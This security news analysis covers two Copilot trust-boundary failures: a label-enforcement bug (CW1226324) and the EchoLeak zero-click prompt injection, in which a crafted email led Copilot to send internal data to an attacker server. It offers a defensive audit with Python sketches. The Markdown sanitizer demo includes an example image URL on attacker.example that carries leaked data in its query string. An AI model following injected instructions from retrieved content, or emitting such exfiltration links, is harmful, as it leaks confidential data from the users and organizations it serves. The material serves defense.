Microsoft Copilot ignored sensitivity labels twice in eight months — and no DLP stack caught either one
For four weeks starting January 21, Microsoft's Copilot read and summarized confidential emails despite every sensitivity label and DLP policy telling it not to. The enforcement points broke inside Microsoft’s own pipeline, and no security tool in the stack flagged it. Among the affected organizations was the U.K.'s National Health Service, which logged it as INC46740412 — a signal of how far the failure reached into regulated healthcare environments. Microsoft tracked it as CW1226324.
The advisory, first reported by BleepingComputer on February 18, marks the second time in eight months that Copilot’s retrieval pipeline violated its own trust boundary — a failure in which an AI system accesses or transmits data it was explicitly restricted from touching. The first was worse.
In June 2025, Microsoft patched CVE-2025-32711, a critical zero-click vulnerability that Aim Security researchers dubbed “EchoLeak.” One malicious email bypassed Copilot’s prompt injection classifier, its link redaction, its Content-Security-Policy controls, and its reference-mention safeguards to silently exfiltrate enterprise data. No clicks and no user action were required. Microsoft assigned it a CVSS score of 9.3.
Two different root causes, one blind spot: a code error and a sophisticated exploit chain produced an identical outcome. Copilot processed data it was explicitly restricted from touching, and the security stack saw nothing.
Why EDR and WAF remain architecturally blind to this
Endpoint detection and response (EDR) monitors file and process behavior. Web application firewalls (WAFs) inspect HTTP payloads. Neither has a detection category for “your AI assistant just violated its own trust boundary.” That gap exists because LLM retrieval pipelines sit behind an enforcement layer that traditional security tools were never designed to observe.
Copilot ingested a labeled email it was told to skip, and the entire action happened inside Microsoft's infrastructure, between the retrieval index and the generation model. Nothing dropped to disk, no anomalous traffic crossed the perimeter, and no process spawned for an endpoint agent to flag. The security stack reported all-clear because it never saw the layer where the violation occurred.
The CW1226324 bug worked because a code-path error allowed messages in Sent Items and Drafts to enter Copilot’s retrieval set despite sensitivity labels and DLP rules that should have blocked them, according to Microsoft’s advisory. EchoLeak worked because Aim Security’s researchers proved that a malicious email, phrased to look like ordinary business correspondence, could manipulate Copilot’s retrieval-augmented generation pipeline into accessing and transmitting internal data to an attacker-controlled server.
Aim Security's researchers characterized it as a fundamental design flaw: agents process trusted and untrusted data in the same thought process, making them structurally vulnerable to manipulation. That design flaw did not disappear when Microsoft patched EchoLeak. CW1226324 proves the enforcement layer around it can fail independently.
The five-point audit that maps to both failure modes
Neither failure triggered a single alert. Both were discovered through vendor advisory channels — not through SIEM, not through EDR, not through WAF.
CW1226324 went public on February 18. Affected tenants had been exposed since January 21. Microsoft has not disclosed how many organizations were affected or what data was accessed during that window. For security leaders, that gap is the story: a four-week exposure inside a vendor's inference pipeline, invisible to every tool in the stack, discovered only because Microsoft chose to publish an advisory.
1. Test DLP enforcement against Copilot directly. CW1226324 existed for four weeks because no one tested whether Copilot actually honored sensitivity labels on Sent Items and Drafts. Create labeled test messages in controlled folders, query Copilot, and confirm it cannot surface them. Run this test monthly. Configuration is not enforcement; the only proof is a failed retrieval attempt.
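A minimal sketch of what that monthly check can look like, assuming a dedicated test mailbox seeded with labeled canary messages and some way to submit a Copilot Chat prompt and capture the answer text; the query_copilot function below is a placeholder for that step, not a documented API.

```python
"""Sketch: monthly canary test for Copilot label enforcement.

Assumptions, not facts from Microsoft's advisory: a dedicated test mailbox
whose Drafts and Sent Items hold labeled messages seeded with unique canary
strings, and some way to submit a Copilot Chat prompt and capture the answer
text. query_copilot is a placeholder for that step, however you implement it."""

from datetime import datetime, timezone

# Canary strings planted inside labeled test messages. If any of them shows
# up in a Copilot answer, the sensitivity label was not enforced at retrieval.
CANARIES = {
    "Drafts": "CANARY-DRAFT-7f3a91",
    "Sent Items": "CANARY-SENT-2c88d0",
}

PROMPTS = [
    "Summarize my most recent draft emails.",
    "What have I sent by email in the last month?",
]


def query_copilot(prompt: str) -> str:
    """Placeholder: return Copilot Chat's answer text for the prompt.

    Manual run, browser automation, or an internal tool; this sketch does
    not assume any particular Copilot API."""
    raise NotImplementedError


def run_canary_check() -> bool:
    leaks = []
    for prompt in PROMPTS:
        answer = query_copilot(prompt)
        for folder, canary in CANARIES.items():
            if canary in answer:
                leaks.append((folder, prompt))
    stamp = datetime.now(timezone.utc).isoformat()
    if leaks:
        for folder, prompt in leaks:
            print(f"[{stamp}] FAIL: labeled content from {folder} surfaced "
                  f"for prompt {prompt!r}")
        return False
    print(f"[{stamp}] PASS: no canary strings surfaced.")
    return True


if __name__ == "__main__":
    raise SystemExit(0 if run_canary_check() else 1)
```

The assertion is the point, not the tooling: a pass is evidence that labels hold at retrieval time, and a fail is the finding that goes to the board.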
2. Block external content from reaching Copilot’s context window. EchoLeak succeeded because a malicious email entered Copilot’s retrieval set and its injected instructions executed as if they were the user’s query. The attack bypassed four distinct defense layers: Microsoft’s cross-prompt injection classifier, external link redaction, Content-Security-Policy controls, and reference mention safeguards, according to Aim Security’s disclosure. Disable external email context in Copilot settings, and restrict Markdown rendering in AI outputs. This catches the prompt-injection class of failure by removing the attack surface entirely.
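Where assistant output passes through a front end you control, restricting Markdown rendering can be as blunt as stripping image references and non-allow-listed links before anything reaches the page. A minimal sketch follows; the allow-listed domain is an example, and it illustrates the control rather than replacing Microsoft's own mitigations.

```python
"""Sketch: strip Markdown images and external links from assistant output
before it reaches a renderer you control. The allow-listed domain is an
example; this illustrates the control, it does not replace vendor mitigations."""

import re

ALLOWED_DOMAINS = {"contoso.sharepoint.com"}  # example internal allow-list

# ![alt](url): rendering a Markdown image fetches its URL with no user click,
# which is the zero-click exfiltration channel the EchoLeak chain abused.
IMAGE_MD = re.compile(r"!\[[^\]]*\]\([^)]*\)")
# [text](url): keep only links whose host is on the allow-list.
LINK_MD = re.compile(r"\[([^\]]*)\]\((https?://([^/)\s]+)[^)]*)\)")


def sanitize(markdown_text: str) -> str:
    # Drop every image reference outright.
    text = IMAGE_MD.sub("[image removed]", markdown_text)

    def keep_or_strip(match: re.Match) -> str:
        label, host = match.group(1), match.group(3).lower()
        if host in ALLOWED_DOMAINS:
            return match.group(0)  # trusted internal link, keep as-is
        return f"{label} [external link removed]"

    return LINK_MD.sub(keep_or_strip, text)


if __name__ == "__main__":
    demo = (
        "Quarterly numbers attached. "
        "![status](https://attacker.example/leak?d=q3-figures) "
        "[full report](https://contoso.sharepoint.com/reports/q3)"
    )
    print(sanitize(demo))
```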
3. Audit Purview logs for anomalous Copilot interactions during the January through February exposure window. Look for Copilot Chat queries that returned content from labeled messages between January 21 and mid-February 2026. Neither failure class produced alerts through existing EDR or WAF, so retrospective detection depends on Purview telemetry. If your tenant cannot reconstruct what Copilot accessed during the exposure window, document that gap formally. It matters for compliance. For any organization subject to regulatory examination, an undocumented AI data access gap during a known vulnerability window is an audit finding waiting to happen.
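If you can export the unified audit log for that window, the retrospective check is a filter, not a product. A minimal sketch, assuming a standard CSV export with CreationDate, Operations, and AuditData columns, and assuming Copilot Chat events surface under the CopilotInteraction operation; verify both assumptions against a sample row from your own tenant before relying on the output.

```python
"""Sketch: retrospective filter over an exported Purview unified audit log.

Assumptions to verify against your own export: the CSV carries CreationDate,
Operations, and AuditData columns, and Copilot Chat events appear under the
CopilotInteraction operation. Column names, operation names, and date formats
vary by tenant and export method."""

import csv
import json
from datetime import datetime, timezone

WINDOW_START = datetime(2026, 1, 21, tzinfo=timezone.utc)
WINDOW_END = datetime(2026, 2, 18, tzinfo=timezone.utc)  # advisory publication
COPILOT_OPERATIONS = {"CopilotInteraction"}  # assumption: check your export


def parse_when(value: str) -> datetime:
    # Export date formats vary; this drops fractional seconds and a trailing
    # 'Z', then assumes UTC if no offset survives. Adjust for your export.
    value = value.strip().replace("Z", "+00:00").split(".")[0]
    when = datetime.fromisoformat(value)
    return when if when.tzinfo else when.replace(tzinfo=timezone.utc)


def copilot_events(path: str):
    with open(path, newline="", encoding="utf-8-sig") as f:
        for row in csv.DictReader(f):
            if row.get("Operations") not in COPILOT_OPERATIONS:
                continue
            if WINDOW_START <= parse_when(row["CreationDate"]) <= WINDOW_END:
                yield row


if __name__ == "__main__":
    hits = 0
    for row in copilot_events("audit_export.csv"):
        detail = json.loads(row.get("AuditData") or "{}")
        user = detail.get("UserId") or row.get("UserIds", "unknown")
        print(row["CreationDate"], user, row["Operations"])
        hits += 1
    print(f"{hits} Copilot interaction(s) fell inside the exposure window.")
```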
4. Turn on Restricted Content Discovery for SharePoint sites with sensitive data. RCD removes sites from Copilot’s retrieval pipeline entirely. It works regardless of whether the trust violation comes from a code bug or an injected prompt, because the data never enters the context window in the first place. This is the containment layer that does not depend on the enforcement point that broke. For organizations handling sensitive or regulated data, RCD is not optional.
5. Build an incident response playbook for vendor-hosted inference failures. Incident response (IR) playbooks need a new category: trust boundary violations inside the vendor’s inference pipeline. Define escalation paths. Assign ownership. Establish a monitoring cadence for vendor service health advisories that affect AI processing. Your SIEM will not catch the next one, either.
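The advisory-monitoring piece is automatable. Below is a sketch of the polling half, assuming an app registration granted ServiceHealth.Read.All and a token acquired elsewhere (get_token is a placeholder); the issue property names should be verified against a live Graph response, and paging and alert routing are left out.

```python
"""Sketch: poll Microsoft Graph service health issues for Copilot-related
advisories, the channel where CW1226324 actually surfaced.

Assumptions: an app registration granted ServiceHealth.Read.All and a token
acquired elsewhere (get_token is a placeholder). Property names on the issue
objects (title, service, impactDescription) should be checked against a live
response; pagination via @odata.nextLink is omitted for brevity."""

import requests

GRAPH_ISSUES = "https://graph.microsoft.com/v1.0/admin/serviceAnnouncement/issues"
KEYWORDS = ("copilot", "purview", "sensitivity label", "dlp")


def get_token() -> str:
    """Placeholder: return an app-only Graph access token (e.g. via MSAL)."""
    raise NotImplementedError


def copilot_related_issues(token: str) -> list[dict]:
    resp = requests.get(
        GRAPH_ISSUES,
        headers={"Authorization": f"Bearer {token}"},
        timeout=30,
    )
    resp.raise_for_status()
    flagged = []
    for issue in resp.json().get("value", []):
        haystack = " ".join(
            str(issue.get(field, ""))
            for field in ("title", "service", "impactDescription")
        ).lower()
        if any(word in haystack for word in KEYWORDS):
            flagged.append(issue)
    return flagged


if __name__ == "__main__":
    for issue in copilot_related_issues(get_token()):
        # Feed these into the IR intake the playbook defines, not a shared inbox.
        print(issue.get("id"), issue.get("status"), issue.get("title"))
```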
The pattern that transfers beyond Copilot
A 2026 survey by Cybersecurity Insiders found that 47% of CISOs and senior security leaders have already observed AI agents exhibit unintended or unauthorized behavior. Organizations are deploying AI assistants into production faster than they can build governance around them.
That trajectory matters because this framework is not Copilot-specific. Any RAG-based assistant pulling from enterprise data runs through the same pattern: a retrieval layer selects content, an enforcement layer gates what the model can see, and a generation layer produces output. If the enforcement layer fails, the retrieval layer feeds restricted data to the model, and the security stack never sees it. Copilot, Gemini for Workspace, and any tool with retrieval access to internal documents carries the same structural risk.
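The structural risk is easiest to see in miniature. The sketch below is a generic illustration, not any vendor's implementation: a toy retrieval layer, an enforcement gate, and a single predicate bug that lets labeled content from Sent Items and Drafts into the context window, with no attacker involved and nothing for an endpoint agent or WAF to observe.

```python
"""Sketch of the generic RAG trust boundary, not any vendor's code: a
retrieval layer selects candidates, an enforcement gate filters by label,
and whatever survives becomes model context. A single predicate bug in the
gate reproduces a CW1226324-style failure with no attacker at all."""

from dataclasses import dataclass


@dataclass
class Doc:
    source: str   # e.g. "Inbox", "Sent Items", "Drafts", "SharePoint"
    label: str    # e.g. "General", "Confidential"
    text: str


def retrieve(corpus: list[Doc], query: str) -> list[Doc]:
    # Toy relevance: keyword overlap. Real systems rank search or embedding hits.
    words = query.lower().split()
    return [d for d in corpus if any(w in d.text.lower() for w in words)]


def enforcement_gate(candidates: list[Doc], buggy: bool = False) -> list[Doc]:
    blocked_labels = {"Confidential"}
    allowed = []
    for d in candidates:
        if d.label in blocked_labels:
            # The bug: the gate exempts some sources, so labeled items from
            # those folders slip straight into the context window.
            if buggy and d.source in {"Sent Items", "Drafts"}:
                allowed.append(d)
            continue
        allowed.append(d)
    return allowed


def build_context(corpus: list[Doc], query: str, buggy: bool) -> list[Doc]:
    return enforcement_gate(retrieve(corpus, query), buggy=buggy)


if __name__ == "__main__":
    corpus = [
        Doc("Inbox", "General", "lunch plans for friday"),
        Doc("Sent Items", "Confidential", "acquisition terms for project falcon"),
    ]
    for buggy in (False, True):
        ctx = build_context(corpus, "project falcon terms", buggy)
        print("gate buggy:", buggy, "->", [(d.source, d.label) for d in ctx])
    # Nothing here touches disk or the network: exactly the layer EDR and WAF miss.
```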
Run the five-point audit before your next board meeting. Start with labeled test messages in a controlled folder. If Copilot surfaces them, every policy underneath is theater.
The board answer: “Our policies were configured correctly. Enforcement failed inside the vendor’s inference pipeline. Here are the five controls we are testing, restricting, and demanding before we re-enable full access for sensitive workloads.”
The next failure will not send an alert.
